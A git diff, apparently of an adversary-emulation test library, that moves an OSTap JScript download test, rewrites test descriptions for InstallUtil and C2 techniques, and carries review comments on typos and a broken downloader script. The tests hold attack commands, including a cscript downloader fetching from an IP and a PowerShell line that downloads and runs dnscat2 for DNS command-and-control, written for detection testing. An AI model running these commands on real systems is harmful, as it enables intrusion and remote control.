diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 582bac4c..d57deb74 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -534,8 +534,9 @@ execution,T1151,Space after Filename,1,Space After Filename
execution,T1154,Trap,1,Trap
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
-execution,T1204,User Execution,2,Maldoc choice flags command execution
-execution,T1204,User Execution,3,OSTAP JS version
+execution,T1204,User Execution,2,OSTap Payload Download
+execution,T1204,User Execution,3,Maldoc choice flags command execution
+execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -637,7 +638,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
-command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b1ff1f86..6329bf54 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -410,8 +410,9 @@ execution,T1216,Signed Script Proxy Execution,2,SyncAppvPublishingServer Signed
execution,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Script Command Execution
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
-execution,T1204,User Execution,2,Maldoc choice flags command execution
-execution,T1204,User Execution,3,OSTAP JS version
+execution,T1204,User Execution,2,OSTap Payload Download
+execution,T1204,User Execution,3,Maldoc choice flags command execution
+execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -440,7 +441,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
-command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 519d1c17..19542d47 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -810,8 +810,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- - Atomic Test #2: Maldoc choice flags command execution [windows]
- - Atomic Test #3: OSTAP JS version [windows]
+ - Atomic Test #2: OSTap Payload Download [windows]
+ - Atomic Test #3: Maldoc choice flags command execution [windows]
+ - Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -986,7 +987,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- - Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index bd589e3f..942514ee 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -676,8 +676,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- - Atomic Test #2: Maldoc choice flags command execution [windows]
- - Atomic Test #3: OSTAP JS version [windows]
+ - Atomic Test #2: OSTap Payload Download [windows]
+ - Atomic Test #3: Maldoc choice flags command execution [windows]
+ - Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -728,7 +729,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- - Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9fbdb301..48eb7c8a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -9143,10 +9143,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
- description: 'Executes the CheckIfInstallable class constructor runner instead
- of executing InstallUtil.
-
-'
+ description: |
+ Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+ If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
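Review bot: The new description at L111 misspells "successfully" as `successfuly`; the same spelling is carried into the InstallHelper entry at L125, into the duplicated `execution:` copies of both entries, and into T1118.md. The neighbouring InstallUtil entries added by this commit read `version information will be displayed the .NET framework install utility`, which is missing a preposition — `version information will be displayed by the .NET framework install utility` reads correctly — and `opperation` in the evasive-invocation entry should be `operation`. These index files appear to be generated, so the corrections presumably belong in the T1118 technique source the index is built from, which is not in view here.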
@@ -9208,10 +9207,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
- description: 'Executes the InstallHelper class constructor runner instead of
- executing InstallUtil.
-
-'
+ description: |
+ Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+ executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -9275,7 +9273,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
- description: 'Executes the installer assembly class constructor.
+ description: 'Executes the installer assembly class constructor. Upon execution,
+ version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9341,7 +9340,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
- description: 'Executes the Install Method
+ description: 'Executes the Install Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9407,7 +9407,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9474,7 +9475,8 @@ defense-evasion:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9540,7 +9542,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, help information
+ will be displayed for InstallUtil.
'
supported_platforms:
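Review bot: The HelpText test's description at L170 still opens with `Executes the Uninstall Method`, text copied from the two Uninstall variants above, and the sentence this commit appends about help information makes the mismatch with the test name more visible. Suggest `description: 'Executes the HelpText Method. Upon execution, help information will be displayed for InstallUtil.'`. The same line is repeated in the `execution:` section of this file and in T1118.md, so all three copies (or the technique source they are generated from) need the same correction.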
@@ -9606,10 +9609,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
- description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
- using a nonstandard extension for the assembly.
-
-'
+ description: |
+ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+ will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -22380,10 +22382,9 @@ execution:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
- description: 'Executes the CheckIfInstallable class constructor runner instead
- of executing InstallUtil.
-
-'
+ description: |
+ Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+ If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22445,10 +22446,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
- description: 'Executes the InstallHelper class constructor runner instead of
- executing InstallUtil.
-
-'
+ description: |
+ Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+ executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22512,7 +22512,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
- description: 'Executes the installer assembly class constructor.
+ description: 'Executes the installer assembly class constructor. Upon execution,
+ version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22578,7 +22579,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
- description: 'Executes the Install Method
+ description: 'Executes the Install Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22644,7 +22646,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22711,7 +22714,8 @@ execution:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22777,7 +22781,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, help information
+ will be displayed for InstallUtil.
'
supported_platforms:
@@ -22843,10 +22848,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
- description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
- using a nonstandard extension for the assembly.
-
-'
+ description: |
+ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+ will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -25322,12 +25326,13 @@ execution:
identifier: T1204
atomic_tests:
- name: OSTap Style Macro Execution
- description: "This Test uses a VBA macro to create and execute #{jse_path} with
- cscript.exe. The .jse file in turn launches wscript.exe.\nExecution is handled
- by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
- to load and execute VBA code into Excel or Word documents.\n\nThis is a known
- execution chain observed by the OSTap downloader commonly used in TrickBot
- campaigns \nReferences:\n https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader\n"
+ description: |
+ This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
+ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
+
+ This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+ References:
+ https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
@@ -25364,6 +25369,30 @@ execution:
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ - name: OSTap Payload Download
+ description: 'Uses cscript //E:jscript to download a file
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_file:
+ description: File to execute jscript code from
+ type: Path
+ default: "%TEMP%\\OSTapGet.js"
+ file_url:
+ description: URL to retrieve file from
+ type: Url
+ default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+ cscript //E:Jscript #{script_file}
+ cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
+
+'
- name: Maldoc choice flags command execution
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
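Review bot: The JScript echoed at L318 calls `stream.SaveToFile(filename, 1)` but `filename` is never declared — the `var` list is `url, fso, request, stream` — so on a 200 response the script aborts with a runtime error instead of writing the file, and a detection engineer validating against this test would see no file-write telemetry and could mistake that for a detection gap. Either the output path has to be declared from an input argument or the description should state the outcome that actually occurs. The description at L300-302 was also left as a single-quoted scalar with trailing blank lines, unlike the other tests this commit converts to `|` block scalars with an "Upon execution" sentence. The default `file_url` is a literal IP over HTTPS; if that server's certificate is issued for a hostname, ServerXMLHTTP will presumably fail validation and take the silent `WScript.Quit(1)` branch, so it is worth confirming the default actually reaches the download path.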
@@ -25400,9 +25429,9 @@ execution:
'
- name: OSTAP JS version
- description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
- \nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
- to load and execute VBA code into Excel or Word documents.\n"
+ description: |
+ Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
+ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
@@ -29425,9 +29454,10 @@ command-and-control:
identifier: T1071
atomic_tests:
- name: Malicious User Agents - Powershell
- description: |
- This test simulates an infected host beaconing to command and control.
- Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+ description: "This test simulates an infected host beaconing to command and
+ control. Upon execution, no output will be displayed. \nUse an application
+ such as Wireshark to record the session and observe user agent strings and
+ responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
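Review bot: The rewritten description at L345-348 is a double-quoted folded scalar with embedded `\n` and a trailing space before the first `\n` (`displayed. \n`), whereas every other description this commit touches is moved to a `|` block scalar; the same choice is made for the CMD variant in the next hunk. A block scalar would keep the line breaks readable in the source and avoid the stray trailing spaces. If the index is generated from the technique yaml, the quoting style is decided there rather than in this file.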
@@ -29444,9 +29474,10 @@ command-and-control:
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - CMD
- description: |
- This test simulates an infected host beaconing to command and control.
- Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+ description: "This test simulates an infected host beaconing to command and
+ control. Upon execution, no out put will be displayed. \nUse an application
+ such as Wireshark to record the session and observe user agent strings and
+ responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
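Review bot: `no out put` at L360 should be `no output`; the Powershell variant at L346 has it right, and the typo is carried into T1071.md. The proposed line is `control. Upon execution, no output will be displayed. \nUse an application` (same trailing-space artefact as the Powershell entry, best removed at the same time).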
@@ -29457,10 +29488,10 @@ command-and-control:
executor:
name: command_prompt
command: |
- curl -s -A "HttpBrowser/1.0" -m3 #{domain}
- curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
- curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
- curl -s -A "*<|>*" -m3 #{domain}
+ curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
+ curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
+ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
+ curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
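Review bot: Appending `>nul 2>&1` at L374-377 discards curl's diagnostics along with its output, so a missing `curl` binary, a name-resolution failure or a `-m3` timeout all look identical to a successful beacon and the operator cannot tell whether any request left the host. Since the test exists to generate network telemetry, a silent failure is easy to mistake for a quiet success; consider redirecting only stdout, e.g. `curl -sS -A "HttpBrowser/1.0" -m3 #{domain} >nul`, so errors still surface, or documenting in the description that failures are suppressed. The same change is mirrored in T1071.md.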
@@ -29484,6 +29515,7 @@ command-and-control:
description: |
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
+ A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29515,6 +29547,7 @@ command-and-control:
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
+ A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29547,12 +29580,13 @@ command-and-control:
name: powershell
elevation_required: false
command: |
- Set-Location $PathToAtomicsFolder
+ Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
+ Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
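Review bot: Dropping the `$` at L402 turns `PathToAtomicsFolder` into a literal directory name, so the line only works if the execution framework substitutes that token before running the command; run as-is, `Set-Location` raises a non-terminating error and the relative `.\T1071\src\T1071-dns-beacon.ps1` on the next line is resolved against whatever the current directory happens to be. If the bare token is the repository convention this is intended, but `Set-Location PathToAtomicsFolder -ErrorAction Stop` would halt the run rather than executing from the wrong directory. The same edit appears in the DNS Long Domain Query hunk below and twice in T1071.md. Separately, the line added at L408 appears to carry a leading space, which surfaces as ` Upon execution` in the generated T1071.md.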
@@ -29573,13 +29607,15 @@ command-and-control:
name: powershell
elevation_required: false
command: |
- Set-Location $PathToAtomicsFolder
+ Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
- name: DNS C2
description: |
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
+
https://github.com/iagox86/dnscat2
+
https://github.com/lukebaggett/dnscat2-powershell
supported_platforms:
- windows
@@ -29599,30 +29635,6 @@ command-and-control:
command: |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
- - name: OSTap Payload Download
- description: 'Uses cscript //E:jscript to download a file
-
-'
- supported_platforms:
- - windows
- input_arguments:
- script_file:
- description: File to execute jscript code from
- type: Path
- default: "%TEMP%\\OSTapGet.js"
- file_url:
- description: URL to retrieve file from
- type: Url
- default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
- cscript //E:Jscript #{script_file}
- cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
-
-'
T1032:
technique:
x_mitre_data_sources:
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index d11484d6..eb8ad788 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -20,13 +20,13 @@ For connections that occur internally within an enclave (such as those between a
- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
-- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download)
-
## Atomic Test #1 - Malicious User Agents - Powershell
-This test simulates an infected host beaconing to command and control.
+This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
+Use an application such as Wireshark to record the session and observe user agent strings and responses.
+
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -59,7 +59,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD
-This test simulates an infected host beaconing to command and control.
+This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
+Use an application such as Wireshark to record the session and observe user agent strings and responses.
+
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -77,10 +79,10 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
```cmd
-curl -s -A "HttpBrowser/1.0" -m3 #{domain}
-curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
-curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
-curl -s -A "*<|>*" -m3 #{domain}
+curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
+curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
+curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
+curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
```
@@ -127,6 +129,7 @@ curl -s -A "*<|>*" -m3 #{domain}
## Atomic Test #4 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
+A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -160,6 +163,7 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #5 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
+A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -181,7 +185,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
```powershell
-Set-Location $PathToAtomicsFolder
+Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -196,6 +200,7 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #6 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
+ Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -214,7 +219,7 @@ The simulation involves sending DNS queries that gradually increase in length un
```powershell
-Set-Location $PathToAtomicsFolder
+Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -229,7 +234,9 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #7 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
+
https://github.com/iagox86/dnscat2
+
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
@@ -257,39 +264,4 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
-
-
-
-## Atomic Test #8 - OSTap Payload Download
-Uses cscript //E:jscript to download a file
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
-| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
-
-
-#### Attack Commands: Run with `command_prompt`!
-
-
-```cmd
-echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
-cscript //E:Jscript #{script_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{script_file} /F /Q >nul 2>&1
-```
-
-
-
-
-
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md
index 7e2df9ab..86dc19fb 100644
--- a/atomics/T1118/T1118.md
+++ b/atomics/T1118/T1118.md
@@ -26,7 +26,8 @@ Adversaries may use InstallUtil to proxy execution of code through a trusted Win
## Atomic Test #1 - CheckIfInstallable method call
